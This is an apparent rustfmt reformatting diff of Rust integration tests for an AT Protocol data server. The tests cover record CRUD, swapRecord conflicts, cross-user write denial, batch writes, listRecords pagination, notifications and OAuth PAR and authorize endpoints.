base_url().await 103 + )) 70 104 .query(&params) 71 105 .send() 72 106 .await 73 107 .expect("Failed to send get-after-update request"); 74 - let get_updated_body: Value = get_updated_res.json().await.expect("get-updated response was not JSON"); 75 - assert_eq!(get_updated_body["value"]["text"], updated_text, "Text was not updated"); 108 + let get_updated_body: Value = get_updated_res 109 + .json() 110 + .await 111 + .expect("get-updated response was not JSON"); 112 + assert_eq!( 113 + get_updated_body["value"]["text"], updated_text, 114 + "Text was not updated" 115 + ); 76 116 let stale_update_payload = json!({ 77 117 "repo": did, 78 118 "collection": collection, ··· 81 121 "swapRecord": initial_cid 82 122 }); 83 123 let stale_res = client 84 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 124 + .post(format!( 125 + "{}/xrpc/com.atproto.repo.putRecord", 126 + base_url().await 127 + )) 85 128 .bearer_auth(&jwt) 86 129 .json(&stale_update_payload) 87 130 .send() 88 131 .await 89 132 .expect("Failed to send stale update"); 90 - assert_eq!(stale_res.status(), StatusCode::CONFLICT, "Stale update should cause 409"); 133 + assert_eq!( 134 + stale_res.status(), 135 + StatusCode::CONFLICT, 136 + "Stale update should cause 409" 137 + ); 91 138 let good_update_payload = json!({ 92 139 "repo": did, 93 140 "collection": collection, ··· 96 143 "swapRecord": updated_cid 97 144 }); 98 145 let good_res = client 99 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 146 + .post(format!( 147 + "{}/xrpc/com.atproto.repo.putRecord", 148 + base_url().await 149 + )) 100 150 .bearer_auth(&jwt) 101 151 .json(&good_update_payload) 102 152 .send() 103 153 .await 104 154 .expect("Failed to send good update"); 105 - assert_eq!(good_res.status(), StatusCode::OK, "Good update should succeed"); 155 + assert_eq!( 156 + good_res.status(), 157 + StatusCode::OK, 158 + "Good update should succeed" 159 + ); 106 160 let delete_payload = json!({ "repo": did, "collection": collection, "rkey": rkey }); 107 161 let delete_res = client 108 - .post(format!("{}/xrpc/com.atproto.repo.deleteRecord", base_url().await)) 162 + .post(format!( 163 + "{}/xrpc/com.atproto.repo.deleteRecord", 164 + base_url().await 165 + )) 109 166 .bearer_auth(&jwt) 110 167 .json(&delete_payload) 111 168 .send() 112 169 .await 113 170 .expect("Failed to send delete request"); 114 - assert_eq!(delete_res.status(), StatusCode::OK, "Failed to delete record"); 171 + assert_eq!( 172 + delete_res.status(), 173 + StatusCode::OK, 174 + "Failed to delete record" 175 + ); 115 176 let get_deleted_res = client 116 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 177 + .get(format!( 178 + "{}/xrpc/com.atproto.repo.getRecord", 179 + base_url().await 180 + )) 117 181 .query(&params) 118 182 .send() 119 183 .await 120 184 .expect("Failed to send get-after-delete request"); 121 - assert_eq!(get_deleted_res.status(), StatusCode::NOT_FOUND, "Record should be deleted"); 185 + assert_eq!( 186 + get_deleted_res.status(), 187 + StatusCode::NOT_FOUND, 188 + "Record should be deleted" 189 + ); 122 190 } 123 191 124 192 #[tokio::test] ··· 127 195 let (did, jwt) = setup_new_user("profile-blob").await; 128 196 let blob_data = b"This is test blob data for a profile avatar"; 129 197 let upload_res = client 130 - .post(format!("{}/xrpc/com.atproto.repo.uploadBlob", base_url().await)) 198 + .post(format!( 199 + "{}/xrpc/com.atproto.repo.uploadBlob", 200 + base_url().await 201 + )) 131 202 .header(header::CONTENT_TYPE, "text/plain") 132 203 .bearer_auth(&jwt) 133 204 .body(blob_data.to_vec()) ··· 149 220 } 150 221 }); 151 222 let create_res = client 152 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 223 + .post(format!( 224 + "{}/xrpc/com.atproto.repo.putRecord", 225 + base_url().await 226 + )) 153 227 .bearer_auth(&jwt) 154 228 .json(&profile_payload) 155 229 .send() 156 230 .await 157 231 .expect("Failed to create profile"); 158 - assert_eq!(create_res.status(), StatusCode::OK, "Failed to create profile"); 232 + assert_eq!( 233 + create_res.status(), 234 + StatusCode::OK, 235 + "Failed to create profile" 236 + ); 159 237 let create_body: Value = create_res.json().await.unwrap(); 160 238 let initial_cid = create_body["cid"].as_str().unwrap().to_string(); 161 239 let get_res = client 162 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 163 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")]) 240 + .get(format!( 241 + "{}/xrpc/com.atproto.repo.getRecord", 242 + base_url().await 243 + )) 244 + .query(&[ 245 + ("repo", did.as_str()), 246 + ("collection", "app.bsky.actor.profile"), 247 + ("rkey", "self"), 248 + ]) 164 249 .send() 165 250 .await 166 251 .expect("Failed to get profile"); ··· 176 261 "swapRecord": initial_cid 177 262 }); 178 263 let update_res = client 179 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 264 + .post(format!( 265 + "{}/xrpc/com.atproto.repo.putRecord", 266 + base_url().await 267 + )) 180 268 .bearer_auth(&jwt) 181 269 .json(&update_payload) 182 270 .send() 183 271 .await 184 272 .expect("Failed to update profile"); 185 - assert_eq!(update_res.status(), StatusCode::OK, "Failed to update profile"); 273 + assert_eq!( 274 + update_res.status(), 275 + StatusCode::OK, 276 + "Failed to update profile" 277 + ); 186 278 let get_updated_res = client 187 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 188 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")]) 279 + .get(format!( 280 + "{}/xrpc/com.atproto.repo.getRecord", 281 + base_url().await 282 + )) 283 + .query(&[ 284 + ("repo", did.as_str()), 285 + ("collection", "app.bsky.actor.profile"), 286 + ("rkey", "self"), 287 + ]) 189 288 .send() 190 289 .await 191 290 .expect("Failed to get updated profile"); ··· 198 297 let client = client(); 199 298 let (alice_did, alice_jwt) = setup_new_user("alice-thread").await; 200 299 let (bob_did, bob_jwt) = setup_new_user("bob-thread").await; 201 - let (root_uri, root_cid) = create_post(&client, &alice_did, &alice_jwt, "This is the root post").await; 300 + let (root_uri, root_cid) = 301 + create_post(&client, &alice_did, &alice_jwt, "This is the root post").await; 202 302 tokio::time::sleep(Duration::from_millis(100)).await; 203 303 let reply_collection = "app.bsky.feed.post"; 204 304 let reply_rkey = format!("e2e_reply_{}", Utc::now().timestamp_millis()); ··· 217 317 } 218 318 }); 219 319 let reply_res = client 220 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 320 + .post(format!( 321 + "{}/xrpc/com.atproto.repo.putRecord", 322 + base_url().await 323 + )) 221 324 .bearer_auth(&bob_jwt) 222 325 .json(&reply_payload) 223 326 .send() ··· 228 331 let reply_uri = reply_body["uri"].as_str().unwrap(); 229 332 let reply_cid = reply_body["cid"].as_str().unwrap(); 230 333 let get_reply_res = client 231 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 232 - .query(&[("repo", bob_did.as_str()), ("collection", reply_collection), ("rkey", reply_rkey.as_str())]) 334 + .get(format!( 335 + "{}/xrpc/com.atproto.repo.getRecord", 336 + base_url().await 337 + )) 338 + .query(&[ 339 + ("repo", bob_did.as_str()), 340 + ("collection", reply_collection), 341 + ("rkey", reply_rkey.as_str()), 342 + ]) 233 343 .send() 234 344 .await 235 345 .expect("Failed to get reply"); ··· 253 363 } 254 364 }); 255 365 let nested_res = client 256 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 366 + .post(format!( 367 + "{}/xrpc/com.atproto.repo.putRecord", 368 + base_url().await 369 + )) 257 370 .bearer_auth(&alice_jwt) 258 371 .json(&nested_payload) 259 372 .send() 260 373 .await 261 374 .expect("Failed to create nested reply"); 262 - assert_eq!(nested_res.status(), StatusCode::OK, "Failed to create nested reply"); 375 + assert_eq!( 376 + nested_res.status(), 377 + StatusCode::OK, 378 + "Failed to create nested reply" 379 + ); 263 380 } 264 381 265 382 #[tokio::test] ··· 276 393 "record": { "$type": "app.bsky.feed.post", "text": "Bob trying to post as Alice", "createdAt": Utc::now().to_rfc3339() } 277 394 }); 278 395 let write_res = client 279 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 396 + .post(format!( 397 + "{}/xrpc/com.atproto.repo.putRecord", 398 + base_url().await 399 + )) 280 400 .bearer_auth(&bob_jwt) 281 401 .json(&post_payload) 282 402 .send() 283 403 .await 284 404 .expect("Failed to send request"); 285 - assert!(write_res.status() == StatusCode::FORBIDDEN || write_res.status() == StatusCode::UNAUTHORIZED, 286 - "Expected 403/401 for writing to another user's repo, got {}", write_res.status()); 287 - let delete_payload = json!({ "repo": alice_did, "collection": "app.bsky.feed.post", "rkey": post_rkey }); 405 + assert!( 406 + write_res.status() == StatusCode::FORBIDDEN 407 + || write_res.status() == StatusCode::UNAUTHORIZED, 408 + "Expected 403/401 for writing to another user's repo, got {}", 409 + write_res.status() 410 + ); 411 + let delete_payload = 412 + json!({ "repo": alice_did, "collection": "app.bsky.feed.post", "rkey": post_rkey }); 288 413 let delete_res = client 289 - .post(format!("{}/xrpc/com.atproto.repo.deleteRecord", base_url().await)) 414 + .post(format!( 415 + "{}/xrpc/com.atproto.repo.deleteRecord", 416 + base_url().await 417 + )) 290 418 .bearer_auth(&bob_jwt) 291 419 .json(&delete_payload) 292 420 .send() 293 421 .await 294 422 .expect("Failed to send request"); 295 - assert!(delete_res.status() == StatusCode::FORBIDDEN || delete_res.status() == StatusCode::UNAUTHORIZED, 296 - "Expected 403/401 for deleting another user's record, got {}", delete_res.status()); 423 + assert!( 424 + delete_res.status() == StatusCode::FORBIDDEN 425 + || delete_res.status() == StatusCode::UNAUTHORIZED, 426 + "Expected 403/401 for deleting another user's record, got {}", 427 + delete_res.status() 428 + ); 297 429 let get_res = client 298 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 299 - .query(&[("repo", alice_did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", post_rkey)]) 430 + .get(format!( 431 + "{}/xrpc/com.atproto.repo.getRecord", 432 + base_url().await 433 + )) 434 + .query(&[ 435 + ("repo", alice_did.as_str()), 436 + ("collection", "app.bsky.feed.post"), 437 + ("rkey", post_rkey), 438 + ]) 300 439 .send() 301 440 .await 302 441 .expect("Failed to verify record exists"); 303 - assert_eq!(get_res.status(), StatusCode::OK, "Record should still exist"); 442 + assert_eq!( 443 + get_res.status(), 444 + StatusCode::OK, 445 + "Record should still exist" 446 + ); 304 447 } 305 448 306 449 #[tokio::test] ··· 317 460 ] 318 461 }); 319 462 let apply_res = client 320 - .post(format!("{}/xrpc/com.atproto.repo.applyWrites", base_url().await)) 463 + .post(format!( 464 + "{}/xrpc/com.atproto.repo.applyWrites", 465 + base_url().await 466 + )) 321 467 .bearer_auth(&jwt) 322 468 .json(&writes_payload) 323 469 .send() ··· 325 471 .expect("Failed to apply writes"); 326 472 assert_eq!(apply_res.status(), StatusCode::OK); 327 473 let get_post1 = client 328 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 329 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", "batch-post-1")]) 330 - .send().await.expect("Failed to get post 1"); 474 + .get(format!( 475 + "{}/xrpc/com.atproto.repo.getRecord", 476 + base_url().await 477 + )) 478 + .query(&[ 479 + ("repo", did.as_str()), 480 + ("collection", "app.bsky.feed.post"), 481 + ("rkey", "batch-post-1"), 482 + ]) 483 + .send() 484 + .await 485 + .expect("Failed to get post 1"); 331 486 assert_eq!(get_post1.status(), StatusCode::OK); 332 487 let post1_body: Value = get_post1.json().await.unwrap(); 333 488 assert_eq!(post1_body["value"]["text"], "First batch post"); 334 489 let get_post2 = client 335 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 336 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", "batch-post-2")]) 337 - .send().await.expect("Failed to get post 2"); 490 + .get(format!( 491 + "{}/xrpc/com.atproto.repo.getRecord", 492 + base_url().await 493 + )) 494 + .query(&[ 495 + ("repo", did.as_str()), 496 + ("collection", "app.bsky.feed.post"), 497 + ("rkey", "batch-post-2"), 498 + ]) 499 + .send() 500 + .await 501 + .expect("Failed to get post 2"); 338 502 assert_eq!(get_post2.status(), StatusCode::OK); 339 503 let get_profile = client 340 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 341 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")]) 342 - .send().await.expect("Failed to get profile"); 504 + .get(format!( 505 + "{}/xrpc/com.atproto.repo.getRecord", 506 + base_url().await 507 + )) 508 + .query(&[ 509 + ("repo", did.as_str()), 510 + ("collection", "app.bsky.actor.profile"), 511 + ("rkey", "self"), 512 + ]) 513 + .send() 514 + .await 515 + .expect("Failed to get profile"); 343 516 let profile_body: Value = get_profile.json().await.unwrap(); 344 517 assert_eq!(profile_body["value"]["displayName"], "Batch User"); 345 518 let update_writes = json!({ ··· 350 523 ] 351 524 }); 352 525 let update_res = client 353 - .post(format!("{}/xrpc/com.atproto.repo.applyWrites", base_url().await)) 526 + .post(format!( 527 + "{}/xrpc/com.atproto.repo.applyWrites", 528 + base_url().await 529 + )) 354 530 .bearer_auth(&jwt) 355 531 .json(&update_writes) 356 532 .send() ··· 358 534 .expect("Failed to apply update writes"); 359 535 assert_eq!(update_res.status(), StatusCode::OK); 360 536 let get_updated_profile = client 361 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 362 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")]) 363 - .send().await.expect("Failed to get updated profile"); 537 + .get(format!( 538 + "{}/xrpc/com.atproto.repo.getRecord", 539 + base_url().await 540 + )) 541 + .query(&[ 542 + ("repo", did.as_str()), 543 + ("collection", "app.bsky.actor.profile"), 544 + ("rkey", "self"), 545 + ]) 546 + .send() 547 + .await 548 + .expect("Failed to get updated profile"); 364 549 let updated_profile: Value = get_updated_profile.json().await.unwrap(); 365 - assert_eq!(updated_profile["value"]["displayName"], "Updated Batch User"); 550 + assert_eq!( 551 + updated_profile["value"]["displayName"], 552 + "Updated Batch User" 553 + ); 366 554 let get_deleted_post = client 367 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 368 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", "batch-post-1")]) 369 - .send().await.expect("Failed to check deleted post"); 370 - assert_eq!(get_deleted_post.status(), StatusCode::NOT_FOUND, "Batch-deleted post should be gone"); 555 + .get(format!( 556 + "{}/xrpc/com.atproto.repo.getRecord", 557 + base_url().await 558 + )) 559 + .query(&[ 560 + ("repo", did.as_str()), 561 + ("collection", "app.bsky.feed.post"), 562 + ("rkey", "batch-post-1"), 563 + ]) 564 + .send() 565 + .await 566 + .expect("Failed to check deleted post"); 567 + assert_eq!( 568 + get_deleted_post.status(), 569 + StatusCode::NOT_FOUND, 570 + "Batch-deleted post should be gone" 571 + ); 371 572 } 372 573 373 - async fn create_post_with_rkey(client: &reqwest::Client, did: &str, jwt: &str, rkey: &str, text: &str) -> (String, String) { 574 + async fn create_post_with_rkey( 575 + client: &reqwest::Client, 576 + did: &str, 577 + jwt: &str, 578 + rkey: &str, 579 + text: &str, 580 + ) -> (String, String) { 374 581 let payload = json!({ 375 582 "repo": did, "collection": "app.bsky.feed.post", "rkey": rkey, 376 583 "record": { "$type": "app.bsky.feed.post", "text": text, "createdAt": Utc::now().to_rfc3339() } 377 584 }); 378 585 let res = client 379 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 586 + .post(format!( 587 + "{}/xrpc/com.atproto.repo.putRecord", 588 + base_url().await 589 + )) 380 590 .bearer_auth(jwt) 381 591 .json(&payload) 382 592 .send() ··· 384 594 .expect("Failed to create record"); 385 595 assert_eq!(res.status(), StatusCode::OK); 386 596 let body: Value = res.json().await.unwrap(); 387 - (body["uri"].as_str().unwrap().to_string(), body["cid"].as_str().unwrap().to_string()) 597 + ( 598 + body["uri"].as_str().unwrap().to_string(), 599 + body["cid"].as_str().unwrap().to_string(), 600 + ) 388 601 } 389 602 390 603 #[tokio::test] ··· 392 605 let client = client(); 393 606 let (did, jwt) = setup_new_user("list-records-test").await; 394 607 for i in 0..5 { 395 - create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await; 608 + create_post_with_rkey( 609 + &client, 610 + &did, 611 + &jwt, 612 + &format!("post{:02}", i), 613 + &format!("Post {}", i), 614 + ) 615 + .await; 396 616 tokio::time::sleep(Duration::from_millis(50)).await; 397 617 } 398 618 let res = client 399 - .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 619 + .get(format!( 620 + "{}/xrpc/com.atproto.repo.listRecords", 621 + base_url().await 622 + )) 400 623 .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")]) 401 - .send().await.expect("Failed to list records"); 624 + .send() 625 + .await 626 + .expect("Failed to list records"); 402 627 assert_eq!(res.status(), StatusCode::OK); 403 628 let body: Value = res.json().await.unwrap(); 404 629 let records = body["records"].as_array().unwrap(); 405 630 assert_eq!(records.len(), 5); 406 - let rkeys: Vec<&str> = records.iter().map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()).collect(); 407 - assert_eq!(rkeys, vec!["post04", "post03", "post02", "post01", "post00"], "Default order should be DESC"); 631 + let rkeys: Vec<&str> = records 632 + .iter() 633 + .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 634 + .collect(); 635 + assert_eq!( 636 + rkeys, 637 + vec!["post04", "post03", "post02", "post01", "post00"], 638 + "Default order should be DESC" 639 + ); 408 640 for record in records { 409 641 assert!(record["uri"].is_string()); 410 642 assert!(record["cid"].is_string()); ··· 412 644 assert!(record["value"].is_object()); 413 645 } 414 646 let rev_res = client 415 - .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 416 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("reverse", "true")]) 417 - .send().await.expect("Failed to list records reverse"); 647 + .get(format!( 648 + "{}/xrpc/com.atproto.repo.listRecords", 649 + base_url().await 650 + )) 651 + .query(&[ 652 + ("repo", did.as_str()), 653 + ("collection", "app.bsky.feed.post"), 654 + ("reverse", "true"), 655 + ]) 656 + .send() 657 + .await 658 + .expect("Failed to list records reverse"); 418 659 let rev_body: Value = rev_res.json().await.unwrap(); 419 - let rev_rkeys: Vec<&str> = rev_body["records"].as_array().unwrap().iter() 420 - .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()).collect(); 421 - assert_eq!(rev_rkeys, vec!["post00", "post01", "post02", "post03", "post04"], "reverse=true should give ASC"); 660 + let rev_rkeys: Vec<&str> = rev_body["records"] 661 + .as_array() 662 + .unwrap() 663 + .iter() 664 + .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 665 + .collect(); 666 + assert_eq!( 667 + rev_rkeys, 668 + vec!["post00", "post01", "post02", "post03", "post04"], 669 + "reverse=true should give ASC" 670 + ); 422 671 let page1 = client 423 - .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 424 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("limit", "2")]) 425 - .send().await.expect("Failed to list page 1"); 672 + .get(format!( 673 + "{}/xrpc/com.atproto.repo.listRecords", 674 + base_url().await 675 + )) 676 + .query(&[ 677 + ("repo", did.as_str()), 678 + ("collection", "app.bsky.feed.post"), 679 + ("limit", "2"), 680 + ]) 681 + .send() 682 + .await 683 + .expect("Failed to list page 1"); 426 684 let page1_body: Value = page1.json().await.unwrap(); 427 685 let page1_records = page1_body["records"].as_array().unwrap(); 428 686 assert_eq!(page1_records.len(), 2); 429 687 let cursor = page1_body["cursor"].as_str().expect("Should have cursor"); 430 688 let page2 = client 431 - .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 432 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("limit", "2"), ("cursor", cursor)]) 433 - .send().await.expect("Failed to list page 2"); 689 + .get(format!( 690 + "{}/xrpc/com.atproto.repo.listRecords", 691 + base_url().await 692 + )) 693 + .query(&[ 694 + ("repo", did.as_str()), 695 + ("collection", "app.bsky.feed.post"), 696 + ("limit", "2"), 697 + ("cursor", cursor), 698 + ]) 699 + .send() 700 + .await 701 + .expect("Failed to list page 2"); 434 702 let page2_body: Value = page2.json().await.unwrap(); 435 703 let page2_records = page2_body["records"].as_array().unwrap(); 436 704 assert_eq!(page2_records.len(), 2); 437 - let all_uris: Vec<&str> = page1_records.iter().chain(page2_records.iter()) 438 - .map(|r| r["uri"].as_str().unwrap()).collect(); 705 + let all_uris: Vec<&str> = page1_records 706 + .iter() 707 + .chain(page2_records.iter()) 708 + .map(|r| r["uri"].as_str().unwrap()) 709 + .collect(); 439 710 let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect(); 440 - assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records"); 711 + assert_eq!( 712 + all_uris.len(), 713 + unique_uris.len(), 714 + "Cursor pagination should not repeat records" 715 + ); 441 716 let range_res = client 442 - .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 443 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), 444 - ("rkeyStart", "post01"), ("rkeyEnd", "post03"), ("reverse", "true")]) 445 - .send().await.expect("Failed to list range"); 717 + .get(format!( 718 + "{}/xrpc/com.atproto.repo.listRecords", 719 + base_url().await 720 + )) 721 + .query(&[ 722 + ("repo", did.as_str()), 723 + ("collection", "app.bsky.feed.post"), 724 + ("rkeyStart", "post01"), 725 + ("rkeyEnd", "post03"), 726 + ("reverse", "true"), 727 + ]) 728 + .send() 729 + .await 730 + .expect("Failed to list range"); 446 731 let range_body: Value = range_res.json().await.unwrap(); 447 - let range_rkeys: Vec<&str> = range_body["records"].as_array().unwrap().iter() 448 - .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()).collect(); 732 + let range_rkeys: Vec<&str> = range_body["records"] 733 + .as_array() 734 + .unwrap() 735 + .iter() 736 + .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 737 + .collect(); 449 738 for rkey in &range_rkeys { 450 - assert!(*rkey >= "post01" && *rkey <= "post03", "Range should be inclusive"); 739 + assert!( 740 + *rkey >= "post01" && *rkey <= "post03", 741 + "Range should be inclusive" 742 + ); 451 743 } 452 744 let limit_res = client 453 - .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 454 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("limit", "1000")]) 455 - .send().await.expect("Failed with high limit"); 745 + .get(format!( 746 + "{}/xrpc/com.atproto.repo.listRecords", 747 + base_url().await 748 + )) 749 + .query(&[ 750 + ("repo", did.as_str()), 751 + ("collection", "app.bsky.feed.post"), 752 + ("limit", "1000"), 753 + ]) 754 + .send() 755 + .await 756 + .expect("Failed with high limit"); 456 757 let limit_body: Value = limit_res.json().await.unwrap(); 457 - assert!(limit_body["records"].as_array().unwrap().len() <= 100, "Limit should be clamped to max 100"); 758 + assert!( 759 + limit_body["records"].as_array().unwrap().len() <= 100, 760 + "Limit should be clamped to max 100" 761 + ); 458 762 let not_found_res = client 459 - .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 460 - .query(&[("repo", "did:plc:nonexistent12345"), ("collection", "app.bsky.feed.post")]) 461 - .send().await.expect("Failed with nonexistent repo"); 763 + .get(format!( 764 + "{}/xrpc/com.atproto.repo.listRecords", 765 + base_url().await 766 + )) 767 + .query(&[ 768 + ("repo", "did:plc:nonexistent12345"), 769 + ("collection", "app.bsky.feed.post"), 770 + ]) 771 + .send() 772 + .await 773 + .expect("Failed with nonexistent repo"); 462 774 assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND); 463 775 }
+1 -1
tests/lifecycle_social.rs
··· 4 4 use common::*; 5 5 use helpers::*; 6 6 use reqwest::StatusCode; 7 - use serde_json::{json, Value}; 7 + use serde_json::{Value, json}; 8 8 9 9 #[tokio::test] 10 10 async fn test_like_lifecycle() {
+2 -4
tests/notifications.rs
··· 1 1 mod common; 2 + use sqlx::PgPool; 2 3 use tranquil_pds::comms::{ 3 4 CommsChannel, CommsStatus, CommsType, NewComms, enqueue_comms, enqueue_welcome, 4 5 }; 5 - use sqlx::PgPool; 6 6 7 7 async fn get_pool() -> PgPool { 8 8 let conn_str = common::get_db_connection_string().await; ··· 109 109 "Test".to_string(), 110 110 "Body".to_string(), 111 111 ); 112 - enqueue_comms(&pool, item) 113 - .await 114 - .expect("Failed to enqueue"); 112 + enqueue_comms(&pool, item).await.expect("Failed to enqueue"); 115 113 } 116 114 let final_count: i64 = sqlx::query_scalar!( 117 115 "SELECT COUNT(*) FROM comms_queue WHERE status = 'pending' AND user_id = $1",
+903 -143
tests/oauth.rs
··· 11 11 use wiremock::{Mock, MockServer, ResponseTemplate}; 12 12 13 13 fn no_redirect_client() -> reqwest::Client { 14 - reqwest::Client::builder().redirect(redirect::Policy::none()).build().unwrap() 14 + reqwest::Client::builder() 15 + .redirect(redirect::Policy::none()) 16 + .build() 17 + .unwrap() 15 18 } 16 19 17 20 fn generate_pkce() -> (String, String) { ··· 47 50 async fn test_oauth_metadata_endpoints() { 48 51 let url = base_url().await; 49 52 let client = client(); 50 - let pr_res = client.get(format!("{}/.well-known/oauth-protected-resource", url)).send().await.unwrap(); 53 + let pr_res = client 54 + .get(format!("{}/.well-known/oauth-protected-resource", url)) 55 + .send() 56 + .await 57 + .unwrap(); 51 58 assert_eq!(pr_res.status(), StatusCode::OK); 52 59 let pr_body: Value = pr_res.json().await.unwrap(); 53 60 assert!(pr_body["resource"].is_string()); 54 61 assert!(pr_body["authorization_servers"].is_array()); 55 - assert!(pr_body["bearer_methods_supported"].as_array().unwrap().contains(&json!("header"))); 56 - let as_res = client.get(format!("{}/.well-known/oauth-authorization-server", url)).send().await.unwrap(); 62 + assert!( 63 + pr_body["bearer_methods_supported"] 64 + .as_array() 65 + .unwrap() 66 + .contains(&json!("header")) 67 + ); 68 + let as_res = client 69 + .get(format!("{}/.well-known/oauth-authorization-server", url)) 70 + .send() 71 + .await 72 + .unwrap(); 57 73 assert_eq!(as_res.status(), StatusCode::OK); 58 74 let as_body: Value = as_res.json().await.unwrap(); 59 75 assert!(as_body["issuer"].is_string()); 60 76 assert!(as_body["authorization_endpoint"].is_string()); 61 77 assert!(as_body["token_endpoint"].is_string()); 62 78 assert!(as_body["jwks_uri"].is_string()); 63 - assert!(as_body["response_types_supported"].as_array().unwrap().contains(&json!("code"))); 64 - assert!(as_body["grant_types_supported"].as_array().unwrap().contains(&json!("authorization_code"))); 65 - assert!(as_body["code_challenge_methods_supported"].as_array().unwrap().contains(&json!("S256"))); 66 - assert_eq!(as_body["require_pushed_authorization_requests"], json!(true)); 67 - assert!(as_body["dpop_signing_alg_values_supported"].as_array().unwrap().contains(&json!("ES256"))); 68 - let jwks_res = client.get(format!("{}/oauth/jwks", url)).send().await.unwrap(); 79 + assert!( 80 + as_body["response_types_supported"] 81 + .as_array() 82 + .unwrap() 83 + .contains(&json!("code")) 84 + ); 85 + assert!( 86 + as_body["grant_types_supported"] 87 + .as_array() 88 + .unwrap() 89 + .contains(&json!("authorization_code")) 90 + ); 91 + assert!( 92 + as_body["code_challenge_methods_supported"] 93 + .as_array() 94 + .unwrap() 95 + .contains(&json!("S256")) 96 + ); 97 + assert_eq!( 98 + as_body["require_pushed_authorization_requests"], 99 + json!(true) 100 + ); 101 + assert!( 102 + as_body["dpop_signing_alg_values_supported"] 103 + .as_array() 104 + .unwrap() 105 + .contains(&json!("ES256")) 106 + ); 107 + let jwks_res = client 108 + .get(format!("{}/oauth/jwks", url)) 109 + .send() 110 + .await 111 + .unwrap(); 69 112 assert_eq!(jwks_res.status(), StatusCode::OK); 70 113 let jwks_body: Value = jwks_res.json().await.unwrap(); 71 114 assert!(jwks_body["keys"].is_array()); ··· 81 124 let (_, code_challenge) = generate_pkce(); 82 125 let par_res = client 83 126 .post(format!("{}/oauth/par", url)) 84 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 85 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256"), ("scope", "atproto"), ("state", "test-state")]) 86 - .send().await.unwrap(); 127 + .form(&[ 128 + ("response_type", "code"), 129 + ("client_id", &client_id), 130 + ("redirect_uri", redirect_uri), 131 + ("code_challenge", &code_challenge), 132 + ("code_challenge_method", "S256"), 133 + ("scope", "atproto"), 134 + ("state", "test-state"), 135 + ]) 136 + .send() 137 + .await 138 + .unwrap(); 87 139 assert_eq!(par_res.status(), StatusCode::CREATED, "PAR should succeed"); 88 140 let par_body: Value = par_res.json().await.unwrap(); 89 141 assert!(par_body["request_uri"].is_string()); ··· 94 146 .get(format!("{}/oauth/authorize", url)) 95 147 .header("Accept", "application/json") 96 148 .query(&[("request_uri", request_uri)]) 97 - .send().await.unwrap(); 149 + .send() 150 + .await 151 + .unwrap(); 98 152 assert_eq!(auth_res.status(), StatusCode::OK); 99 153 let auth_body: Value = auth_res.json().await.unwrap(); 100 154 assert_eq!(auth_body["client_id"], client_id); ··· 103 157 let invalid_res = client 104 158 .get(format!("{}/oauth/authorize", url)) 105 159 .header("Accept", "application/json") 106 - .query(&[("request_uri", "urn:ietf:params:oauth:request_uri:nonexistent")]) 107 - .send().await.unwrap(); 160 + .query(&[( 161 + "request_uri", 162 + "urn:ietf:params:oauth:request_uri:nonexistent", 163 + )]) 164 + .send() 165 + .await 166 + .unwrap(); 108 167 assert_eq!(invalid_res.status(), StatusCode::BAD_REQUEST); 109 - let missing_res = client.get(format!("{}/oauth/authorize", url)).send().await.unwrap(); 110 - 